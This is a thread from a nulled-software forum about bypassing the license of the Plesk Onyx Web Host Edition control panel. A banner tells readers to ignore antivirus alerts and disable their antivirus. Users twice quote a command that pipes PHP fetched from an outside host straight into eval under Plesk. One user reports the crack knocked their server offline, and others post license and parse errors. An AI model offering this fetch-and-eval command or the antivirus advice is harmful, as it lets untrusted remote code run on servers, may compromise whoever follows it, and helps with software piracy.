• You MUST read the Babiato Rules before making your first post otherwise you may get permanent warning points or a permanent Ban.

Our resources on Babiato Forum are CLEAN and SAFE. So you can use them for development and testing purposes. If your are on Windows and have an antivirus that alerts you about a possible infection: Know it's a false positive because all scripts are double checked by our experts. We advise you to add Babiato to trusted sites/sources or disable your antivirus momentarily while downloading a resource. "Enjoy your presence on Babiato"

Plesk Onyx Web Host Edition

Dot no used .. blocked you server

do not use it it works but 1 hour later your server no longer works .. there is a security I had to reinstall all my server ..
I have been using it for few months without any issues. If anyone else is having issues please report in this thread.

• Love
Reactions: fuad12
plesk php -er "eval(file_get_contents('http://ossav.com/PTC'));"

Hi guys, I'm getting this error any solution for this:

Lisans Yukleniyor...
Hata: 'The license key is invalid. In order to use Plesk, please obtain and install a new valid license key.
The license key is intended only for use with Plesk operating inside the following virtual environments: Virtuozzo containers, VMWare, Microsoft Hyper-V, Xen, KVM, Virtuozzo Server, LXC, Docker.'

When i put key manually in plesk i got this error :
This license key has reached the maximum number of trial activations. Request a new trial license or buy a paid one. (Error code: 2)
Paste the activation code you received.

Last edited:
plesk php -er "eval(file_get_contents('http://ossav.com/PTC'));"

Hi guys, I'm getting this error any solution for this:

Lisans Yukleniyor...
Hata: 'The license key is invalid. In order to use Plesk, please obtain and install a new valid license key.
The license key is intended only for use with Plesk operating inside the following virtual environments: Virtuozzo containers, VMWare, Microsoft Hyper-V, Xen, KVM, Virtuozzo Server, LXC, Docker.'

When i put key manually in plesk i got this error :
This license key has reached the maximum number of trial activations. Request a new trial license or buy a paid one. (Error code: 2)
Paste the activation code you received.
Not work expired the ossav find user share license https://ossav.com/Plesk-Trial/

*** Hidden text: cannot be quoted. ***
PHP Parse error: syntax error, unexpected '<', expecting end of file in Command line code(1) : eval()'d code on line 1
exit status 254

PHP Parse error: syntax error, unexpected '?', expecting end of file in Command line code(1) : eval()'d code on line 1
exit status 254

Reactions: rashadulalam
AdBlock Detected

We get it, advertisements are annoying!

However in order to keep our huge array of resources free of charge we need to generate income from ads so to use the site you will need to turn off your adblocker.

If you'd like to have an ad free experience you can become a Babiato Lover by donating as little as $5 per month. Click on the Donate menu tab for more info.

I've Disabled AdBlock